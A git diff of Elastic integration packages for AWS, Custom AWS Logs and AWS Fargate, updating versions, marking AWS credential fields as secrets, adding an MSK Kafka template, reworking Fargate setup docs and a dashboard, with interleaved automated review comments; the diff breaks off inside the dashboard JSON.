b/packages/aws/manifest.yml index bcd73d13786..03f7628cddf 100644 --- a/packages/aws/manifest.yml +++ b/packages/aws/manifest.yml @@ -1,7 +1,7 @@ format_version: 3.0.0 name: aws title: AWS -version: 2.11.3 +version: 2.14.1 description: Collect logs and metrics from Amazon Web Services (AWS) with Elastic Agent. type: integration categories: @@ -10,7 +10,7 @@ conditions: elastic: subscription: basic kibana: - version: "^8.10.2" + version: "^8.12.0" screenshots: - src: /img/metricbeat-aws-overview.png title: metricbeat aws overview 
@@ -36,20 +36,23 @@ vars: required: false show_user: false - name: access_key_id - type: text + type: password title: Access Key ID + secret: true multi: false required: false show_user: true - name: secret_access_key - type: text + type: password title: Secret Access Key + secret: true multi: false required: false show_user: true - name: session_token - type: text + type: password title: Session Token + secret: true multi: false required: false show_user: true @@ -679,6 +682,7 @@ policy_templates: - securityhub_insights categories: - security + - cloudsecurity_cdr inputs: - type: httpjson title: Collect AWS Security Hub logs via API @@ -704,6 +708,7 @@ policy_templates: - inspector categories: - security + - cloudsecurity_cdr inputs: - type: httpjson title: Collect AWS Inspector logs via API @@ -723,6 +728,8 @@ policy_templates: description: Collect Amazon GuardDuty logs with Elastic Agent. data_streams: - guardduty + categories: + - cloudsecurity_cdr inputs: - type: httpjson title: Collect Amazon GuardDuty logs via API @@ -806,6 +813,28 @@ policy_templates: title: AWS EMR logo size: 32x32 type: image/svg+xml + - name: kafka + title: Amazon Managed Streaming for Apache Kafka (MSK) + description: Collect Amazon MSK metrics with Elastic Agent + data_streams: + - kafka_metrics + categories: + - observability + inputs: + - type: aws/metrics + title: Collect Amazon MSK metrics + description: Collect Amazon MSK metrics using AWS CloudWatch + input_group: metrics + icons: + - src: /img/logo_msk.svg + title: Amazon MSK logo + size: 32x32 + type: image/svg+xml + screenshots: + - src: /img/metricbeat-aws-kafka-overview.png + title: metricbeat aws kafka overview + size: 2640x2240 + type: image/png owner: github: elastic/obs-ds-hosted-services type: elastic diff --git a/packages/aws_logs/changelog.yml b/packages/aws_logs/changelog.yml index b607cb921f3..ade9e5881fc 100644 --- a/packages/aws_logs/changelog.yml +++ b/packages/aws_logs/changelog.yml 
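Review bot: `secret: true` is added to access_key_id, secret_access_key and session_token, but this file's `format_version: 3.0.0` (context of the first hunk) is left unchanged, whereas the aws_logs manifest in the same commit bumps `format_version` to `3.0.2` with a changelog entry that ties the spec bump to enabling `secret`. Unless 3.0.0 already accepts the `secret` attribute, package-spec validation will reject this manifest; confirm the minimum spec version for `secret`, or bump `format_version: 3.0.2` here to match aws_logs. The `kibana: version: "^8.12.0"` bump in the earlier hunk is consistent with secret-backed variables, so only the spec version looks out of step. The vars block continues outside the hunk.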
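Review bot: The new `kafka` policy template's `description: Collect Amazon MSK metrics with Elastic Agent` drops the trailing period that the sibling templates use (the GuardDuty context line in an earlier hunk reads `Collect Amazon GuardDuty logs with Elastic Agent.`); `description: Collect Amazon MSK metrics with Elastic Agent.` keeps the policy_templates listing consistent. This is purely a wording consistency point; the template structure itself mirrors the other entries.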
@@ -1,4 +1,14 @@ -- version: 0.6.0 +- version: "1.1.0" + changes: + - description: Update the package format_version to 3.0.2 and enable 'secret' for the sensitive fields + type: enhancement + link: https://github.com/elastic/integrations/pull/9019 +- version: "1.0.0" + changes: + - description: Release package as GA. + type: enhancement + link: https://github.com/elastic/integrations/pull/8991 +- version: "0.6.0" changes: - description: Update the package format_version to 3.0.0. type: enhancement diff --git a/packages/aws_logs/manifest.yml b/packages/aws_logs/manifest.yml index 3da7fc8ebdc..2374cd4e72e 100644 --- a/packages/aws_logs/manifest.yml +++ b/packages/aws_logs/manifest.yml @@ -1,16 +1,16 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: aws_logs title: Custom AWS Logs description: Collect raw logs from AWS S3 or CloudWatch with Elastic Agent. type: integration -version: "0.6.0" +version: "1.1.0" categories: - observability - custom - aws conditions: kibana: - version: ^8.0.0 + version: ^8.12.0 elastic: subscription: basic policy_templates: @@ -42,20 +42,23 @@ vars: required: false show_user: false - name: access_key_id - type: text + type: password title: Access Key ID + secret: true multi: false required: false show_user: true - name: secret_access_key - type: text + type: password title: Secret Access Key + secret: true multi: false required: false show_user: true - name: session_token - type: text + type: password title: Session Token + secret: true multi: false required: false show_user: true diff --git a/packages/awsfargate/_dev/build/docs/README.md b/packages/awsfargate/_dev/build/docs/README.md index 55660c2ea04..14416c070e8 100644 --- a/packages/awsfargate/_dev/build/docs/README.md +++ b/packages/awsfargate/_dev/build/docs/README.md 
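Review bot: The `kibana: version` constraint moves from `^8.0.0` to `^8.12.0`, which stops the package from installing on any 8.x stack below 8.12, yet the 1.1.0 changelog entry in this commit only mentions the format_version bump and the `secret` flag. Consider extending that entry, e.g. `description: Update the package format_version to 3.0.2, enable 'secret' for the sensitive fields and require Kibana 8.12.0 or later`, so operators can see why the upgrade is gated. The higher minimum is presumably what the secret-backed credential variables need; if so, stating that in the entry would make the coupling explicit.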
@@ -1,8 +1,14 @@ # AWS Fargate Integration -The AWS Fargate integration helps to retrieve metadata, network metrics, and Docker stats about your containers and the tasks that are a part of an [Amazon Elastic Container Service (Amazon ECS)](https://aws.amazon.com/ecs/?pg=ln&sec=hiw) cluster. +## Overview -## How to set it up +The AWS Fargate integration helps to retrieve metadata, network metrics, and Docker stats about your containers and the tasks that are part of an [Amazon Elastic Container Service (Amazon ECS)](https://aws.amazon.com/ecs/?pg=ln&sec=hiw) cluster. + +## Credentials + +No AWS credentials are required for this integration. The ECS task metadata endpoint is accessible inside the cluster only. + +## Setup To start collecting AWS Fargate metrics, you must run the Elastic Agent as a [sidecar](https://www.oreilly.com/library/view/designing-distributed-systems/9781491983638/ch02.html) container alongside your application container in the same task definition. 
@@ -24,37 +30,27 @@ TaskDefinition: Image: - Name: elastic-agent-container << ===== Elastic Agent container - Image: docker.elastic.co/beats/elastic-agent:8.1.0 + Image: docker.elastic.co/beats/elastic-agent:8.12.0 ``` The Elastic Agent collects metrics using the [Amazon ECS task metadata endpoint](https://docs.aws.amazon.com/AmazonECS/latest/userguide/task-metadata-endpoint-fargate.html). The Amazon ECS task metadata endpoint is an HTTP endpoint available to each container and enabled by default on [AWS Fargate platform version 1.4.0](https://aws.amazon.com/blogs/containers/aws-fargate-launches-platform-version-1-4/) and later. The Elastic Agent uses [Task metadata endpoint version 4](https://docs.aws.amazon.com/AmazonECS/latest/userguide/task-metadata-endpoint-v4-fargate.html). -## Credentials - -No AWS credentials are required for this integration. The ECS task metadata endpoint is accessible inside the cluster only. - -## Getting Started +## Getting started using the AWS Management Console This section shows you how to run the Elastic Agent in a ECS cluster, start collecting Fargate on ECS metrics, and send them to an Elastic Stack. -First, we'll see a simple example, setting up a task definition and a service on an existing ECS cluster using the AWS web console; this is the quickest path to have the integration up and running in your existing ECS cluster. - -Second, we'll see a complete setup from scratch of a cluster, a service, and a task using a CloudFormation template and the AWS CLI. - -Let's get started! - -### Using the AWS web console - -#### Task Definition +To quickly deploy on your existing ECS cluster, follow these steps. -Open the AWS web console and visit the Amazon ECS page. Here you can select "Task Definitions" and then "Create new Task Definition" to start the wizard. +### Task Definition -In the step 1 select "Fargate" from the list of available launch types. +Open the AWS Management Console and visit the Amazon ECS page. 
Here you can select "Task Definitions" and then "Create new Task Definition" to start the wizard. -In the step 2: +Step 1: +- Select "Fargate" from the list of available launch types. +Step 2: - Add your preferred name for the "Task definition name", for example "elastic-agent-fargate-deployment". - For the "Task role", select "ecsFargateTaskExecutionRole". - For the "Operating system family", select "Linux". @@ -64,7 +60,7 @@ In the step 2: As for the container, you can use the following values: - Container name: `elastic-agent-container` -- Image: `docker.elastic.co/beats/elastic-agent:8.1.0` +- Image: `docker.elastic.co/beats/elastic-agent:8.12.0` - Environment variables: - FLEET_ENROLL: `yes` - FLEET_ENROLLMENT_TOKEN: `` @@ -72,13 +68,13 @@ As for the container, you can use the following values: Tip: use the AWS Secrets Manager to store the Fleet Server enrollment token. -#### Service +### Service Select an existing ECS cluster and create a new service with launch type "FARGATE". Use the task definition we just created. As soon as the Elastic Agent is started, open the dashboard "\[AWS Fargate\] Fargate Overview" and you will see the metrics show up in few minutes. -### Using the AWS CLI +## Getting started using the AWS CLI In this example, we will use the AWS CLI and a CloudFormation template to set up the following resources: @@ -86,11 +82,11 @@ In this example, we will use the AWS CLI and a CloudFormation template to set up - a task definition for the Elastic Agent, - a service to execute the agent task on the cluster. -#### Setup +### Setup Prepare you terminal and AWS environment to create the ECS cluster for the testing. -##### Pick a region +#### Pick a region Set default AWS region for this session: @@ -98,7 +94,7 @@ Set default AWS region for this session: export AWS_DEFAULT_REGION="us-east-1" ``` -##### Secrets management +#### Secrets management Store the enrollment token and the Fleet Server URL in the AWS Secrets Manager: 
@@ -122,11 +118,11 @@ aws secretsmanager put-secret-value \ --secret-string ``` -##### Networking +#### Networking One more thing. You need to pick one subnet where your ECS cluster will be created in. Take note of the subnet ID for the very next step. -#### Deploy the stack +### Deploy the stack Copy the following CloudFormation template and save it on you computer with the name `cloudformation.yml`: @@ -207,7 +203,7 @@ Resources: ExecutionRoleArn: !Ref ExecutionRole ContainerDefinitions: - Name: elastic-agent-container - Image: docker.elastic.co/beats/elastic-agent:8.1.0 + Image: docker.elastic.co/beats/elastic-agent:8.12.0 Secrets: - Name: FLEET_ENROLLMENT_TOKEN ValueFrom: !Ref FleetEnrollmentTokenSecretArn @@ -271,7 +267,7 @@ The AWS CLI will return a `StackId`: } ``` -Check the stack status until it has reached the `CREATE_COMPLETE` status. Use the AWS web console or the AWS CLI (requires the tool [jq](https://stedolan.github.io/jq/)): +Check the stack status until it has reached the `CREATE_COMPLETE` status. Use the AWS Management Console or the AWS CLI (requires the tool [jq](https://stedolan.github.io/jq/)): ```shell $ aws cloudformation list-stacks | jq '.StackSummaries[] | .StackName + " " + .StackStatus' @@ -281,7 +277,7 @@ $ aws cloudformation list-stacks | jq '.StackSummaries[] | .StackName + " " + .S That's it! -#### Clean up +### Clean up Once you're done with experimenting, you can remove all the resources (ECS cluster, task, service, etc) with the following command: diff --git a/packages/awsfargate/changelog.yml b/packages/awsfargate/changelog.yml index 0bee93f3b76..e74f74c9c32 100644 --- a/packages/awsfargate/changelog.yml +++ b/packages/awsfargate/changelog.yml 
@@ -1,4 +1,19 @@ # newer versions go on top +- version: 1.0.0 + changes: + - description: Make AWS Fargate GA + type: enhancement + link: https://github.com/elastic/integrations/pull/7366 +- version: 0.5.1 + changes: + - description: Improve documentation + type: enhancement + link: https://github.com/elastic/integrations/pull/9130 +- version: 0.5.0 + changes: + - description: Remove memory.usage.pct field and use memory.usage.total instead for plain memory usage. + type: bugfix + link: https://github.com/elastic/integrations/pull/8254 - version: 0.4.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/awsfargate/data_stream/task_stats/fields/fields.yml b/packages/awsfargate/data_stream/task_stats/fields/fields.yml index f19aa6a79f8..33a2711954c 100644 --- a/packages/awsfargate/data_stream/task_stats/fields/fields.yml +++ b/packages/awsfargate/data_stream/task_stats/fields/fields.yml @@ -312,12 +312,6 @@ format: bytes description: | Max memory usage. - - name: pct - type: scaled_float - metric_type: gauge - format: percent - description: | - Memory usage percentage. - name: total type: long metric_type: gauge diff --git a/packages/awsfargate/data_stream/task_stats/manifest.yml b/packages/awsfargate/data_stream/task_stats/manifest.yml index 6aee989ec6b..ccc532e3d67 100644 --- a/packages/awsfargate/data_stream/task_stats/manifest.yml +++ b/packages/awsfargate/data_stream/task_stats/manifest.yml @@ -1,6 +1,5 @@ type: metrics title: AWS Fargate task_stats metrics -release: beta elasticsearch: index_mode: "time_series" streams: diff --git a/packages/awsfargate/data_stream/task_stats/sample_event.json b/packages/awsfargate/data_stream/task_stats/sample_event.json index 1cee8fce259..60881d31920 100644 --- a/packages/awsfargate/data_stream/task_stats/sample_event.json +++ b/packages/awsfargate/data_stream/task_stats/sample_event.json 
@@ -125,7 +125,6 @@ }, "usage": { "max": 15294464, - "pct": 0.003136136404770672, "total": 12349440 } }, diff --git a/packages/awsfargate/docs/README.md b/packages/awsfargate/docs/README.md index d9fb594fbaa..d00a269918f 100644 --- a/packages/awsfargate/docs/README.md +++ b/packages/awsfargate/docs/README.md @@ -1,8 +1,14 @@ # AWS Fargate Integration -The AWS Fargate integration helps to retrieve metadata, network metrics, and Docker stats about your containers and the tasks that are a part of an [Amazon Elastic Container Service (Amazon ECS)](https://aws.amazon.com/ecs/?pg=ln&sec=hiw) cluster. +## Overview -## How to set it up +The AWS Fargate integration helps to retrieve metadata, network metrics, and Docker stats about your containers and the tasks that are part of an [Amazon Elastic Container Service (Amazon ECS)](https://aws.amazon.com/ecs/?pg=ln&sec=hiw) cluster. + +## Credentials + +No AWS credentials are required for this integration. The ECS task metadata endpoint is accessible inside the cluster only. + +## Setup To start collecting AWS Fargate metrics, you must run the Elastic Agent as a [sidecar](https://www.oreilly.com/library/view/designing-distributed-systems/9781491983638/ch02.html) container alongside your application container in the same task definition. 
@@ -24,37 +30,27 @@ TaskDefinition: Image: - Name: elastic-agent-container << ===== Elastic Agent container - Image: docker.elastic.co/beats/elastic-agent:8.1.0 + Image: docker.elastic.co/beats/elastic-agent:8.12.0 ``` The Elastic Agent collects metrics using the [Amazon ECS task metadata endpoint](https://docs.aws.amazon.com/AmazonECS/latest/userguide/task-metadata-endpoint-fargate.html). The Amazon ECS task metadata endpoint is an HTTP endpoint available to each container and enabled by default on [AWS Fargate platform version 1.4.0](https://aws.amazon.com/blogs/containers/aws-fargate-launches-platform-version-1-4/) and later. The Elastic Agent uses [Task metadata endpoint version 4](https://docs.aws.amazon.com/AmazonECS/latest/userguide/task-metadata-endpoint-v4-fargate.html). -## Credentials - -No AWS credentials are required for this integration. The ECS task metadata endpoint is accessible inside the cluster only. - -## Getting Started +## Getting started using the AWS Management Console This section shows you how to run the Elastic Agent in a ECS cluster, start collecting Fargate on ECS metrics, and send them to an Elastic Stack. -First, we'll see a simple example, setting up a task definition and a service on an existing ECS cluster using the AWS web console; this is the quickest path to have the integration up and running in your existing ECS cluster. - -Second, we'll see a complete setup from scratch of a cluster, a service, and a task using a CloudFormation template and the AWS CLI. - -Let's get started! - -### Using the AWS web console - -#### Task Definition +To quickly deploy on your existing ECS cluster, follow these steps. -Open the AWS web console and visit the Amazon ECS page. Here you can select "Task Definitions" and then "Create new Task Definition" to start the wizard. +### Task Definition -In the step 1 select "Fargate" from the list of available launch types. +Open the AWS Management Console and visit the Amazon ECS page. 
Here you can select "Task Definitions" and then "Create new Task Definition" to start the wizard. -In the step 2: +Step 1: +- Select "Fargate" from the list of available launch types. +Step 2: - Add your preferred name for the "Task definition name", for example "elastic-agent-fargate-deployment". - For the "Task role", select "ecsFargateTaskExecutionRole". - For the "Operating system family", select "Linux". @@ -64,7 +60,7 @@ In the step 2: As for the container, you can use the following values: - Container name: `elastic-agent-container` -- Image: `docker.elastic.co/beats/elastic-agent:8.1.0` +- Image: `docker.elastic.co/beats/elastic-agent:8.12.0` - Environment variables: - FLEET_ENROLL: `yes` - FLEET_ENROLLMENT_TOKEN: `` @@ -72,13 +68,13 @@ As for the container, you can use the following values: Tip: use the AWS Secrets Manager to store the Fleet Server enrollment token. -#### Service +### Service Select an existing ECS cluster and create a new service with launch type "FARGATE". Use the task definition we just created. As soon as the Elastic Agent is started, open the dashboard "\[AWS Fargate\] Fargate Overview" and you will see the metrics show up in few minutes. -### Using the AWS CLI +## Getting started using the AWS CLI In this example, we will use the AWS CLI and a CloudFormation template to set up the following resources: @@ -86,11 +82,11 @@ In this example, we will use the AWS CLI and a CloudFormation template to set up - a task definition for the Elastic Agent, - a service to execute the agent task on the cluster. -#### Setup +### Setup Prepare you terminal and AWS environment to create the ECS cluster for the testing. -##### Pick a region +#### Pick a region Set default AWS region for this session: @@ -98,7 +94,7 @@ Set default AWS region for this session: export AWS_DEFAULT_REGION="us-east-1" ``` -##### Secrets management +#### Secrets management Store the enrollment token and the Fleet Server URL in the AWS Secrets Manager: 
@@ -122,11 +118,11 @@ aws secretsmanager put-secret-value \ --secret-string ``` -##### Networking +#### Networking One more thing. You need to pick one subnet where your ECS cluster will be created in. Take note of the subnet ID for the very next step. -#### Deploy the stack +### Deploy the stack Copy the following CloudFormation template and save it on you computer with the name `cloudformation.yml`: @@ -207,7 +203,7 @@ Resources: ExecutionRoleArn: !Ref ExecutionRole ContainerDefinitions: - Name: elastic-agent-container - Image: docker.elastic.co/beats/elastic-agent:8.1.0 + Image: docker.elastic.co/beats/elastic-agent:8.12.0 Secrets: - Name: FLEET_ENROLLMENT_TOKEN ValueFrom: !Ref FleetEnrollmentTokenSecretArn @@ -271,7 +267,7 @@ The AWS CLI will return a `StackId`: } ``` -Check the stack status until it has reached the `CREATE_COMPLETE` status. Use the AWS web console or the AWS CLI (requires the tool [jq](https://stedolan.github.io/jq/)): +Check the stack status until it has reached the `CREATE_COMPLETE` status. Use the AWS Management Console or the AWS CLI (requires the tool [jq](https://stedolan.github.io/jq/)): ```shell $ aws cloudformation list-stacks | jq '.StackSummaries[] | .StackName + " " + .StackStatus' @@ -281,7 +277,7 @@ $ aws cloudformation list-stacks | jq '.StackSummaries[] | .StackName + " " + .S That's it! -#### Clean up +### Clean up Once you're done with experimenting, you can remove all the resources (ECS cluster, task, service, etc) with the following command: 
@@ -352,7 +348,6 @@ If you want to learn more about Amazon ECS metrics, take a look at the blog post | awsfargate.task_stats.memory.rss.usage.total | Total memory usage. | long | gauge | | awsfargate.task_stats.memory.stats.\* | Raw memory stats from the cgroups memory.stat interface | unsigned_long | | | awsfargate.task_stats.memory.usage.max | Max memory usage. | long | counter | -| awsfargate.task_stats.memory.usage.pct | Memory usage percentage. | scaled_float | gauge | | awsfargate.task_stats.memory.usage.total | Total memory usage. | long | gauge | | awsfargate.task_stats.network.\*.inbound.bytes | Total number of incoming bytes. | long | counter | | awsfargate.task_stats.network.\*.inbound.dropped | Total number of dropped incoming packets. | long | counter | @@ -521,7 +516,6 @@ An example event for `task_stats` looks as following: }, "usage": { "max": 15294464, - "pct": 0.003136136404770672, "total": 12349440 } }, diff --git a/packages/awsfargate/img/awsfargate-integration-overview.png b/packages/awsfargate/img/awsfargate-integration-overview.png index 79e79267004..b6481ea9665 100644 Binary files a/packages/awsfargate/img/awsfargate-integration-overview.png and b/packages/awsfargate/img/awsfargate-integration-overview.png differ diff --git a/packages/awsfargate/kibana/dashboard/awsfargate-20dc7c50-2e89-11eb-991c-c5fd3b7f5a63.json b/packages/awsfargate/kibana/dashboard/awsfargate-20dc7c50-2e89-11eb-991c-c5fd3b7f5a63.json index 16271ba9b23..ba08f85277d 100644 --- a/packages/awsfargate/kibana/dashboard/awsfargate-20dc7c50-2e89-11eb-991c-c5fd3b7f5a63.json +++ b/packages/awsfargate/kibana/dashboard/awsfargate-20dc7c50-2e89-11eb-991c-c5fd3b7f5a63.json 
@@ -4,1104 +4,1254 @@ "chainingSystem": "HIERARCHICAL", "controlStyle": "oneLine", "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"ee100059-0e56-4e9b-ae09-ff53234bdf8c\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"cloud.region\",\"title\":\"Region Name\",\"id\":\"ee100059-0e56-4e9b-ae09-ff53234bdf8c\",\"enhancements\":{}}},\"e967cd1f-7491-4e72-8d63-23fcef40b9cc\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"awsfargate.task_stats.cluster_name\",\"title\":\"Cluster Name\",\"id\":\"e967cd1f-7491-4e72-8d63-23fcef40b9cc\",\"enhancements\":{}}},\"b2adcf17-72de-46e8-87b1-94c16c399bf0\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"container.labels.com_amazonaws_ecs_task-definition-family\",\"title\":\"Task Name\",\"id\":\"b2adcf17-72de-46e8-87b1-94c16c399bf0\",\"enhancements\":{}}}}" + "panelsJSON": "{\"17bd1c1a-3360-43ae-90d7-f4ad286bbbce\":{\"order\":0,\"width\":\"small\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"cloud.region\",\"title\":\"Region Name\",\"id\":\"17bd1c1a-3360-43ae-90d7-f4ad286bbbce\",\"enhancements\":{},\"searchTechnique\":\"prefix\"}},\"97e445ae-63fe-4841-a7f9-cac0071c336b\":{\"order\":1,\"width\":\"small\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"awsfargate.task_stats.cluster_name\",\"title\":\"Cluster Name\",\"id\":\"97e445ae-63fe-4841-a7f9-cac0071c336b\",\"enhancements\":{},\"searchTechnique\":\"prefix\"}},\"12d08143-512a-4a8a-ae17-101d4786f7c1\":{\"order\":2,\"width\":\"small\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"container.labels.com_amazonaws_ecs_task-definition-family\",\"title\":\"Task 
Name\",\"id\":\"12d08143-512a-4a8a-ae17-101d4786f7c1\",\"enhancements\":{},\"searchTechnique\":\"prefix\"}},\"5bf10aa8-18dc-488b-a012-d7391b591685\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"small\",\"explicitInput\":{\"id\":\"5bf10aa8-18dc-488b-a012-d7391b591685\",\"fieldName\":\"container.id\",\"title\":\"Container ID\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"prefix\",\"enhancements\":{}}},\"257ac79f-80db-4f65-b10a-b680c7f217e1\":{\"type\":\"optionsListControl\",\"order\":4,\"grow\":true,\"width\":\"small\",\"explicitInput\":{\"id\":\"257ac79f-80db-4f65-b10a-b680c7f217e1\",\"fieldName\":\"container.name\",\"title\":\"Container Name\",\"grow\":true,\"width\":\"small\",\"searchTechnique\":\"prefix\",\"enhancements\":{}}}}" }, "description": "Overview of AWS Fargate Metrics", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], "query": { "language": "kuery", "query": "" - } + }, + "filter": [ + { + "meta": { + "disabled": false, + "negate": false, + "alias": null, + "key": "data_stream.dataset", + "field": "data_stream.dataset", + "params": { + "query": "awsfargate.task_stats" + }, + "type": "phrase", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "awsfargate.task_stats" + } + }, + "$state": { + "store": "appState" + } + } + ] } }, "optionsJSON": { "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ - { - "embeddableConfig": { + { + "type": "lens", + "gridData": { + "h": 14, + "i": "dce84c11-4c70-448f-86c4-820b164072b6", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "dce84c11-4c70-448f-86c4-820b164072b6", + "embeddableConfig": { "attributes": { - "description": "", - "references": [ + "title": "Container Table [Metrics AWSFargate]", + "description": "", + "visualizationType": "lnsDatatable", + "type": "lens", + 
"references": [ + { + "type": "index-pattern", + "id": "metrics-*", + "name": "indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a" + } + ], + "state": { + "visualization": { + "columns": [ { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" + "columnId": "eb452b61-bf12-46c0-afae-c0f1c776156c", + "width": 206.5666666666667, + "isTransposed": false, + "isMetric": false }, { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "e350c9e6-e6b7-40f1-83ed-94a38ed9467a": { - "columnOrder": [ - "040803fd-23f9-4f4f-95da-e8be99becbc1", - "eb452b61-bf12-46c0-afae-c0f1c776156c", - "b1e08425-6a1e-4db6-bb47-a65167b7e14f", - "09de0d9e-c174-46cf-bdc8-50158475b4a7", - "e0782143-0636-43b4-8fac-b857ea5282b2", - "7626706b-6efa-4fe7-b45c-6e9afa07f982", - "441ceb32-53e7-4408-9638-6dfd38202144" - ], - "columns": { - "040803fd-23f9-4f4f-95da-e8be99becbc1": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Task Name", - "operationType": "terms", - "params": { - "orderBy": { - "type": "alphabetical" - }, - "orderDirection": "asc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "container.labels.com_amazonaws_ecs_task-definition-family" - }, - "09de0d9e-c174-46cf-bdc8-50158475b4a7": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "CPU", - "operationType": "average", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 3 - } - } - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.cpu.total.norm.pct" - }, - "441ceb32-53e7-4408-9638-6dfd38202144": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Memory", - "operationType": "average", - "params": { - "format": { - "id": "percent", - 
"params": { - "decimals": 3 - } - } - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.memory.usage.pct" - }, - "7626706b-6efa-4fe7-b45c-6e9afa07f982": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Memory Usage", - "operationType": "average", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.memory.usage.total" - }, - "b1e08425-6a1e-4db6-bb47-a65167b7e14f": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "ECS Cluster ARN", - "operationType": "terms", - "params": { - "orderBy": { - "type": "alphabetical" - }, - "orderDirection": "asc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "container.labels.com_amazonaws_ecs_cluster" - }, - "e0782143-0636-43b4-8fac-b857ea5282b2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "DiskIO", - "operationType": "average", - "scale": "ratio", - "sourceField": "awsfargate.task_stats.diskio.total" - }, - "eb452b61-bf12-46c0-afae-c0f1c776156c": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Container Name", - "operationType": "terms", - "params": { - "orderBy": { - "type": "alphabetical" - }, - "orderDirection": "asc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "container.name" - } - } - } - } - } + "columnId": "040803fd-23f9-4f4f-95da-e8be99becbc1", + "width": 174.82083333333335 + }, + { + "alignment": "left", + "columnId": "09de0d9e-c174-46cf-bdc8-50158475b4a7", + "width": 94.35486111111106 }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + { + "alignment": "left", + "columnId": "e0782143-0636-43b4-8fac-b857ea5282b2", + "width": 137.31666666666666 + }, + { + "alignment": "left", + "columnId": "7626706b-6efa-4fe7-b45c-6e9afa07f982", + "width": 
145.70972222222224 }, - "visualization": { - "columns": [ - { - "columnId": "eb452b61-bf12-46c0-afae-c0f1c776156c" + { + "columnId": "c3bebf6b-2327-4780-93c5-7eaa5da9e136", + "isTransposed": false, + "isMetric": false, + "width": 167.16666666666663 + }, + { + "columnId": "be5220e6-b8d6-4453-aa6d-c23115fd5a79", + "isTransposed": false, + "isMetric": true, + "width": 150.7097222222222, + "alignment": "left" + }, + { + "columnId": "698193ae-8b08-4c27-ac8d-8db3b79c667f", + "isTransposed": false, + "isMetric": true, + "alignment": "left" + } + ], + "layerId": "e350c9e6-e6b7-40f1-83ed-94a38ed9467a", + "layerType": "data", + "rowHeight": "single", + "headerRowHeight": "single", + "rowHeightLines": 1, + "headerRowHeightLines": 1, + "paging": { + "size": 10, + "enabled": false + } + }, + "query": { + "language": "kuery", + "query": "" + }, + "filters": [], + "datasourceStates": { + "formBased": { + "layers": { + "e350c9e6-e6b7-40f1-83ed-94a38ed9467a": { + "columnOrder": [ + "040803fd-23f9-4f4f-95da-e8be99becbc1", + "eb452b61-bf12-46c0-afae-c0f1c776156c", + "c3bebf6b-2327-4780-93c5-7eaa5da9e136", + "09de0d9e-c174-46cf-bdc8-50158475b4a7", + "e0782143-0636-43b4-8fac-b857ea5282b2", + "7626706b-6efa-4fe7-b45c-6e9afa07f982", + "698193ae-8b08-4c27-ac8d-8db3b79c667f", + "be5220e6-b8d6-4453-aa6d-c23115fd5a79", + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X0", + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X1" + ], + "columns": { + "040803fd-23f9-4f4f-95da-e8be99becbc1": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Task Name", + "operationType": "terms", + "params": { + "orderBy": { + "type": "alphabetical" + }, + "orderDirection": "asc", + "parentFormat": { + "id": "terms" + }, + "size": 20 }, - { - "columnId": "040803fd-23f9-4f4f-95da-e8be99becbc1" + "scale": "ordinal", + "sourceField": "container.labels.com_amazonaws_ecs_task-definition-family" + }, + "09de0d9e-c174-46cf-bdc8-50158475b4a7": { + "label": "CPU", + "dataType": "number", + "operationType": 
